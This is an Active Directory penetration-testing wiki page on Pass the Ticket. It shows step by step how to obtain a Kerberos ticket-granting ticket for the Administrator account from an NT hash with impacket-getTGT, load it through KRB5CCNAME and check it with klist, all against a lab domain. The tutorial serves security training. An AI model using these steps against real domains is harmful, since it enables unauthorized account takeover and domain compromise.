Pass the Ticket - maxbirnbacher/ADPentesting101 GitHub Wiki

Introduction

What: Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account’s password.

Why: It may not be possible to authenticate with NTLM, and only Kerberos authentication is allowed.  I won’t even attempt to explain how Kerberos works (I don’t quite get it honestly) but it can be very useful to understand how to use it in attacks.

How: The normal way to create a Kerberos ticket on Linux is by using kinit with the username, domain, and password.  If you don’t have the password, this is a problem.  Fortunately, impacket has a tool that allows you to use an NT Hash to acquire a valid Ticket Granting Ticket (TGT) from a domain controller.  Unfortunately however, Linux distros don’t typically have Kerberos tools installed on them and you will need to set them up.

Prerequisites

  • Install the kerberos package
  • Configure the AD realm
  • Get DNS working properly
  • Sync time
  • /etc/hosts entry like this 172.27.12.20 dc.tophack.local tophack.local

impacket-getTGT

Create a Kerberos TGT using an NT hash

impacket-getTGT tophack.local/Administrator -hashes aad3b435b51404eeaad3b435b51404ee:e52d9c51eade9526fb936c716ec3dde1   
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Saving ticket in Administrator.ccache

Copy the ticket to /tmp/krb5cc_0, as a lot of tools look for it in that location. Set the KRB5CCNAME environment variable to the ticket location, as some tools use that to find the ticket location.

cp user.ccache /tmp/krb5cc_0
export KRB5CCNAME=/tmp/krb5cc_0

Validate the ticket using klist (part of krb5-user package).

klist                     
Ticket cache: FILE:/tmp/krb5cc_0
Default principal: [email protected]

Valid starting     Expires            Service principal
04/23/24 11:10:18  04/23/24 21:10:18  krbtgt/[email protected]
        renew until 04/24/24 11:10:18

Now that you have a ticket you can use it with all of the impacket tools as an alternative to providing a password or NT hash.  This will prove to be very useful in certain situations as you will see next.  Do note that whenever using Kerberos authentication you will want to use DNS names of targets instead of IP addresses.

Source: https://www.n00py.io/2020/12/alternative-ways-to-pass-the-hash-pth/